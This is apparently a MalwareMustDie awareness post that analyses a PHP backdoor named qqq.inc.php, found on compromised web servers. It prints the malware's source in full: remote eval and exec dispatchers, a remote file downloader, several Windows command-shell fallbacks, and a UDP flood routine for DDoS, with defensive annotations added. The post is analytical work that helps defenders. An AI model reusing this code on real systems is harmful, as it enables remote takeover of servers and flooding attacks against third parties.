qqq.inc.php PHP Hacks aimed DDoS & Windows Remote Shell
- # MalwareMustDie Awareness Post
- # Case: Webapp/PHP (Read: Web Hacking)
- # Target OS: Windows (with PHP and/or Perl)
- # Interface: PHP (Flaw), Perl (Shell), FTP (Hacks) Remote Windows Executable Environment/commands
- # Path: /qqq.inc.php
- # UDP Flood, Services Remote Control, API Remote Shell
- # Credit: Malware Hunter @malpush (twitter)
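- // Spotted base code (plain or after obfuscation). The listing is hard-wrapped, so identifiers and strings are split across lines, and it begins mid-statement.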
- 1) { $evaled = ""; for($i = 1; $i < count($command); $i++) $evaled .= $command[$i];
- if($lasteval != $evaled) { eval($evaled); $lasteval = $evaled; } } if($command[0] ==
- "eval" && count($command) > 1) { $evaled = ""; for($i = 1; $i < count($command); $i
- ++) $evaled .= $command[$i]; eval($evaled); } if($command[0] == "execonce" && count(
- $command) > 1) { $toexec = ""; for($i = 1; $i < count($command); $i++) $toexec .= $c
- ommand[$i]; $toexec = str_replace("%LOLTMPLOL%", whereistmP(), $toexec); if($lastexe
- c != $toexec) { Exe($toexec); $lastexec = $toexec; } } if($command[0] == "exec" && c
- ount($command) > 1) { $toexec = ""; for($i = 1; $i < count($command); $i++) $toexec
- .= $command[$i]; $toexec = str_replace("%LOLTMPLOL%", whereistmP(), $toexec); Exe($t
- oexec); } if($command[0] == "downonce" && count($command) == 3) { $command[1] = str_
- replace("%LOLTMPLOL%", whereistmP(), $command[1]); $command[2] = str_replace("%LOLTM
- PLOL%", whereistmP(), $command[2]); $todown = ""; for($i = 1; $i < count($command);
- $i++) $todown .= $command[$i]; if($lastdown != $todown) { $content = @file_get_conte
- nts($command[1]); file_put_contents($command[2], $content); $lastdown = $todown; } }
- if($command[0] == "down" && count($command) == 3) { $command[1] = str_replace("%LOL
- TMPLOL%", whereistmP(), $command[1]); $command[2] = str_replace("%LOLTMPLOL%", where
- istmP(), $command[2]); $todown = ""; for($i = 1; $i < count($command); $i++) $todown
- .= $command[$i]; $content = @file_get_contents($command[1]); file_put_contents($com
- mand[2], $content); } $end = time(); $left = $time - ($end - $start); if($left > 0)
- sleep($left); } } function whereistmP() { $uploadtmp=ini_get('upload_tmp_dir'); $uf=
- getenv('USERPROFILE'); $af=getenv('ALLUSERSPROFILE'); $se=ini_get('session.save_path
- '); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_wr
- itable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))retur
- n '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if
- (is_dir($uf) && is_writable($uf))return $uf; if(is_dir($af) && is_writable($af))retu
- rn $af; if(is_dir($se) && is_writable($se))return $se; if(is_dir($uploadtmp) && is_w
- ritable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))re
- turn $envtmp; return '.'; } function srvshelL($command) { $name=whereistmP()."\\".un
- iqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system3
- 2\\cmd.exe':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=
- >$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); win32_start_service($n); win3
- 2_stop_service($n); win32_delete_service($n); while(!file_exists($name))sleep(1); $e
- xec=file_get_contents($name); unlink($name); return $exec; } function ffishelL($comm
- and) { $name=whereistmP()."\\".uniqid('NJ'); $api=new ffi("[lib='kernel32.dll'] int
- WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0)
- ; while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name);
- return $exec; } function comshelL($command,$ws) { $exec=$ws->exec("cmd.exe /c $comm
- and"); $so=$exec->StdOut(); return $so->ReadAll(); } function perlshelL($command) {
- $perl=new perl(); ob_start(); $perl->eval("system(\"$command\")"); $exec=ob_get_cont
- ents(); ob_end_clean(); return $exec; } function Exe($command) { $exec=$output=''; $
- dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(function_exists('passthru')){ob
- _start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();} els
- eif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$
- output=ob_get_contents();ob_clean();$exec=$tmp;} elseif(function_exists('exec')){@ex
- ec($command,$output);$output=join("\n",$output);$exec=$output;} elseif(function_exis
- ts('shell_exec'))$exec=@shell_exec($command); elseif(function_exists('popen')){$outp
- ut=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);
- } elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!
- feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($re
- s);} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3))
- === 'WIN')$exec=winshelL($command); elseif(function_exists('win32_create_service')
- && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command); elseif(exten
- sion_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($com
- mand); elseif(extension_loaded('perl'))$exec=perlshelL($command); return $exec; } fu
- nction udpflood($host,$port,$time,$packetsize) { $packet = ""; for($i=0;$i<$packetsi
- ze;$i++) { $packet .= chr(rand(1,256)); } $end = time() + $time; $multitarget = fals
- e; if(strpos($host, ",") !== FALSE) { $multitarget = true; $host = explode(",", $hos
- t); } $i = 0; if($multitarget) { $fp = array(); foreach($host as $hostt) $fp[] = fso
- ckopen("udp://".$hostt,$port,$e,$s,5); $count = count($host); while(true) { fwrite($
- fp[$i % $count],$packet); fflush($fp[$i % $count]); if($i % 100 == 0) { if($end < ti
- me()) break; } $i++; } foreach($fp as $fpp) fclose($fpp); } else { $fp = fsockopen("
- udp://".$host,$port,$e,$s,5); while(true) { fwrite($fp,$packet); fflush($fp); if($i
- % 100 == 0) { if($end < time()) break; } $i++; } fclose($fp); } $env = $i *
- $packetsize; $env = $env / 1048576; $vel = $env / $time; $vel = round($vel);
- $env = round($env); }
- // -----------------------------------------------------
- // The part below is a partial breakdown
- // of the malicious functions (after beautification)
- // -----------------------------------------------------
- // PoC conditions used for remote control (tail of the Exe() dispatcher):
- elseif (function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) ===
- 'WIN') $exec = winshelL($command);
- elseif (function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) ===
- 'WIN') $exec = srvshelL($command);
- elseif (extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec =
- ffishelL($command);
- elseif (extension_loaded('perl')) $exec = perlshelL($command);
- return $exec;
- }
- // DDoS / UDP Flooder:
- function udpflood($host, $port, $time, $packetsize) // Analyst note: sends UDP datagrams of $packetsize bytes to $host:$port for roughly $time seconds; nothing is returned.
- { // Defender view: on a compromised web host this typically shows up as sustained outbound UDP from the PHP / web-server process; egress filtering on the web tier limits the impact.
- $packet = "";
- for ($i = 0; $i < $packetsize; $i++) // payload is built once per call from random bytes, so there is no fixed payload to signature on
- {
- $packet.= chr(rand(1, 256));
- }
- $end = time() + $time; // wall-clock deadline for the send loops below
- $multitarget = false;
- if (strpos($host, ",") !== FALSE) // a comma in $host switches to multi-target mode
- {
- $multitarget = true;
- $host = explode(",", $host);
- }
- $i = 0; // datagram counter, shared by both branches
- if ($multitarget)
- {
- $fp = array();
- foreach($host as $hostt) $fp[] = fsockopen("udp://" . $hostt, $port, $e, $s, 5); // one UDP socket per listed target; 5 is the fsockopen timeout in seconds
- $count = count($host);
- while (true)
- {
- fwrite($fp[$i % $count], $packet); // targets are served round-robin, same payload every time
- fflush($fp[$i % $count]);
- if ($i % 100 == 0) // the clock is only checked every 100 sends, so the run can overshoot $end slightly
- {
- if ($end < time()) break;
- }
- $i++;
- }
- foreach($fp as $fpp) fclose($fpp);
- }
- else
- {
- $fp = fsockopen("udp://" . $host, $port, $e, $s, 5); // single-target path: same loop with one socket
- while (true)
- {
- fwrite($fp, $packet);
- fflush($fp);
- if ($i % 100 == 0)
- {
- if ($end < time()) break;
- }
- $i++;
- }
- fclose($fp);
- }
- $env = $i * $packetsize; // total bytes written
- $env = $env / 1048576; // converted to MiB
- $vel = $env / $time; // MiB per second
- $vel = round($vel);
- $env = round($env); // $env and $vel are computed but neither returned nor printed in this listing
- }
- // Remote shell (Windows EXE): fragment of Exe(), beginning partway through its exec() branch
- $output = join("\n", $output);
- $exec = $output;
- }
- elseif (function_exists('shell_exec')) $exec = @shell_exec($command);
- elseif (function_exists('popen'))
- {
- $output = @popen($command, 'r');
- while (!feof($output))
- {
- $exec = fgets($output);
- }
- pclose($output);
- }
- elseif (function_exists('proc_open'))
- {
- $res = @proc_open($command, $dep, $pipes);
- while (!feof($pipes[1]))
- {
- $line = fgets($pipes[1]);
- $output.= $line;
- }
- $exec = $output;
- proc_close($res);
- }
- elseif (function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec = winshelL($command);
- elseif (function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec = srvshelL($command);
- elseif (extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec = ffishelL($command);
- elseif (extension_loaded('perl')) $exec = perlshelL($command);
- return $exec;}
- // Perl Shell:
- function perlshelL($command) // Analyst note: runs $command through the PHP "perl" extension and returns whatever it printed.
- {
- $perl = new perl(); // only works when the perl extension is loaded; Exe() checks extension_loaded('perl') before calling this
- ob_start(); // output buffering captures what the Perl system() call prints
- $perl->eval("system(\"$command\")"); // $command is interpolated unescaped into the Perl source string
- $exec = ob_get_contents();
- ob_end_clean();
- return $exec;
- }
- // CMD Shell
- function comshelL($command, $ws) // Analyst note: runs "cmd.exe /c $command" through $ws and returns the text read from its StdOut; no caller appears in this listing.
- {
- $exec = $ws->exec("cmd.exe /c $command"); // $ws is supplied by the caller (not shown); presumably a COM WScript.Shell object, confirm against the full sample
- $so = $exec->StdOut();
- return $so->ReadAll();
- }
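- // FFI shell: calls WinExec from kernel32.dll through the PHP FFI extension and reads the command output back from a temp file named with uniqid('NJ'). The listing ends before this function's closing brace.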
- function ffishelL($command)
- {
- $name = whereistmP() . "\\" . uniqid('NJ');
- $api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
- $res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
- while (!file_exists($name)) sleep(1);
- $exec = file_get_contents($name);
- unlink($name);
- return $exec;
- // Much more information is available exclusively to MMD forum members.
- # MalwareMustDie!!
- # Reported by @unixfreaxjp | $ date
- Sun Jan 5 22:21:58 JST 2014